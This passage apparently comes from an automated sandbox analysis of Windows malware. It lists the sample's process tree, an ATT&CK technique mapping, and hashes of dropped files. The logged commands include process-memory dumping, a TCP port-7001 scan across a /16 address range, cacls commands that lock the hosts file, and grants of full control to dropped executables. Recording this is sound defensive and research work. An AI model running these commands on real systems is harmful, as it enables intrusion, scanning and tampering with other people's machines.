C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2944 C:\Windows\TEMP\lubbeisit\2944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2504 C:\Windows\TEMP\lubbeisit\2504.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4904 C:\Windows\TEMP\lubbeisit\4904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2316 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\lubbeisit\abkgigiey\scan.bat2⤵PID:2960
-
C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exenstjgbafp.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1452 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3240
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3672
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5340
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:456
-
C:\Windows\SysWOW64\fkjvgk.exeC:\Windows\SysWOW64\fkjvgk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3620
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe1⤵PID:4144
-
C:\Windows\ime\euikgtl.exeC:\Windows\ime\euikgtl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3444
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F1⤵PID:2280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3460
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F2⤵PID:2752
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F1⤵PID:2616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:872
-
C:\Windows\system32\cacls.execacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F2⤵PID:2436
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe1⤵PID:5224
-
C:\Windows\ime\euikgtl.exeC:\Windows\ime\euikgtl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:232
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F1⤵PID:3492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6140
-
C:\Windows\system32\cacls.execacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F2⤵PID:5556
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F1⤵PID:4308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4132
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F2⤵PID:2848
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
26.2MB
MD548833d2a45c5d768d863c3b68e010bed
SHA1d0e26a7817dc823ffeeaef4992988718dd22b826
SHA256cf50bac521859d95faf30ca92a795e864ae63ffc3f81468075764d584f1a7a99
SHA5125b4b2fb0ebcfcf7fa54c0272213c10ff50ee214ed601f181da0890467eb450e38e4dd22932b537eaa670279fab92fd8af3481f93d75461101248aad7fca5b6c6
-
Filesize
4.1MB
MD5d3480d7b88aec6614dd0f62deba67da3
SHA1885eb6fa8d593d44747cba8decccb18647a185fc
SHA2567d8c94472b77a20c20e0810649e0b0e1098ed409afe6f7a0ce12c7accf390dd2
SHA512d741c548e18f9895ac6a847d5819879af7dafc9b64cb64e479e50bc065e2cd74fc6f44d68ec56c1a2605188f28e02a2fbbf7b6352eeb9beecf28c26224a3678e
-
Filesize
3.6MB
MD5bef10ce15cad62e4e1425f942703150b
SHA125e9e498e6cb59dfeba593439c8de45de716470d
SHA25690fa194c43ffca60d964e11e3d24b86251052e758e6fbf9101e4a01086cfaa1c
SHA5128d0b02bba183b19b21c639478738c29bfedb8425b69de545eaa3497df9fdb4ca8418f0001d93e3057027050a880725d5f887c3231378f25708bd045673a2334f
-
Filesize
8.6MB
MD57df3eeee275f4bfe8b2ffa87eb6c30cc
SHA1ba197b9745a4f94f9305c49bb8120d3f80deb48f
SHA256e8f705a45bb0608b3cbbc14cd062af12330d8af33029667edc74c0d315fdb8fc
SHA512c358273ae6b1eb76f7810ee148a961edbf530f26f4bc5b60927e91bacc6d552f4fd28aa204b766c8ef3dc24ed3b454f69438a1f13d0969d686078f6d424f2686
-
Filesize
7.5MB
MD5e19628ea82dd4332ad216bb147c9fc40
SHA1f4d6ef365b8bfc0dbffdd5106ef311906d542656
SHA256f11066a46639f93571f9cf31946809b8e2c661add7a7ecd022583e91077330c7
SHA512673f5307a6bc142350d1c3ed3711e0a5f80e1c2e9a25710f703dc7497c95e75e07d5a73efd7cf0e61f5afc3e679a005a5c6fe44c952490ea90ba678bd7bc6616
-
Filesize
45.5MB
MD5a181fa5f01a10430c394a7b7e35bf7b5
SHA1f0b477e2051dffaa430d77741c71d73c47f1910a
SHA2567826ea2dfbb72eeb22003d1cefccb1716d34121a6d2e48db1132896a90791bec
SHA51220febf7858a205caf2159d70176e2fb4e2dfdee2693725926cffc27855bfa056af43848fa41b4ea7913fd167d513e9406712f21614f0635c67aef828448ac828
-
Filesize
2.9MB
MD531269450968842071685941fd09785b1
SHA1462428309f0592270e585b6cb1c5a03c5b8cacff
SHA256acc470f988561a042e43db642a88079f1a015ae1596b087521518453d465a199
SHA512d57e7799347bd5a36abc3772e3ac594e84d3f2ac106b2484d3c0dfe18138045cc22cdb44e1c7dda594363404b6208d873b1014bfaae6437bfe9da793b0e8cbff
-
Filesize
1.5MB
MD574727b9822e4b2eabd23a6648233dced
SHA15d5368eb272ef1b7b95e0e86fd51d5ddfd0a6037
SHA2567ea8de7a9dfb38e4868e1cee344b8a5b171677fbfe881ab7e589f833c935e885
SHA512856f19683e8c1ed7037db74d3be395b9e991c8bcf518e77cbdeeab6b5b4ec9f503720e40a19fc3804c5a72bdd48b0ec279d9204caaf93cdca6d3f58e74db2ddd
-
Filesize
810KB
MD5a50afda9463d801eab4a900b73bcc965
SHA1d376be318688593beb17aa413febe55d4f377fcb
SHA2564de27f152e90ebc0f16dbdfc6ec79349b0c32dc778497f1f6b8bd1b5f0c45cae
SHA51250038a6b3b98456944a108cc70eb4094afa2b233057b4469c8dc386995f62985680c18f5ea7a8151744f3201575ccc3d2cd2f26d317eb28d7dd81cd26c03bf53
-
Filesize
2.1MB
MD51f85e42a957926a7fae2c22c556f19e5
SHA12953dfa6df74770db8ae46e51c7bb95f5d5750df
SHA256d615d4fb2f3138dd485ceb1ff155ba2aa590ba2a65faf6fa0c90fb0681a7be0b
SHA512dc9c50091434931f51be9bad33e6fe7f33310ac9eb614b13722cce7e01994bd862c809412862860c3f6de7267077bbe609e2e912a9df56d7ab805e6c5a8c509b
-
Filesize
20.5MB
MD50cfaca8d58e96aa0eb10827a9aa8075d
SHA1ef8a2a597b8dcebaec2a3ac2102c948f4997d780
SHA256e60e15cbda518e4dedb5d5d08baad0b610068ebe543566856594f1efd724b2c6
SHA512666edf1aebdec64ac30bc5ffa8330b87c532fd1348b4f0ce5b92872cbe624520ed22894bc4e276a34864fbc15a67f20723017081235836a7e4263f7ca4447660
-
Filesize
4.4MB
MD50f1470af4c42443fcf3f67cace4ba7a7
SHA18f520d2297a863794b6fc946c040b19f11d96036
SHA2562ad1872f49cb09526ab56493de6984a6999986eab57604e364b80a2d8acdeb52
SHA5125fd979b8cd83d686f4505a427799db70f572044e191de6eedb2660d22f3cf3b5e0b975b8c51b7ca0ed5f5f37dca743b888e0fda9fad486291b2cb3dc9ad07788
-
Filesize
1.2MB
MD5967ce65eddb11f5e238e41dcb5ad5806
SHA1d09d8045383e97c03e1299a6c7eca2ee177e4773
SHA256090164babbcf9ffb28ab15fb44054ee3cf4a3976f0325f47f99348c4a3fa0787
SHA51252b8515ee158b588cef635e3f8851f1d22a2c11f0d072cc38f5c4affcd581f089e510393212e4ca1799a9cfc60a2cea0ba1b5bf4fddd7b55b3e42d86046546c9
-
Filesize
33.3MB
MD562ac367b9e87d3cc60da5eb670796d99
SHA14fabbd004f0a1a56415329f11c136f3a508ce2ea
SHA2560d4a50bbb27881be269d241929a262cf58ffae29e65d376e72e6120bd93ab7e2
SHA5125b8db753b93f28235b960d86d6d33c1b254c8ebeea69316b0c9423589d2ef902c462c27014d88c1ee655e393acd798559585a3ec2ecf54a51c271b5ac5c76068
-
Filesize
1019KB
MD52e5f94c66807242b752a9f5356397d8c
SHA18dfafa8298ad914624fb71fa88ac542d51dbee2e
SHA256b18e6a3dfa17365201333c008841e694a4cb0fac4c28db199939dc7ea70c2b70
SHA512b200866349fe8ccf63f5dde7c6bc980e763f98ada8076a98091ba78901e4f0a439513f3a115fa142f97dcd4cf6c0c8b21003a5a8c315da3336e6a59e310a4a38
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
8.7MB
MD563ba92c4f8f210f6492693a5b893f301
SHA13c5c85c22f14cc55814a07efffe1f2b1114e56fd
SHA256f04009cb678580f3d2719f43c1325ad89fceb2786bcf51499f1d7101a04f0fd0
SHA51283c8fa61b1aa9a6cc483d0168f21f9a5e0701ef9c584c08205c9228281c2c577fb6a5fa9c7b0957d29bebd0b185b10c275461a47c7cea32d48475a69f11a9e2b
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376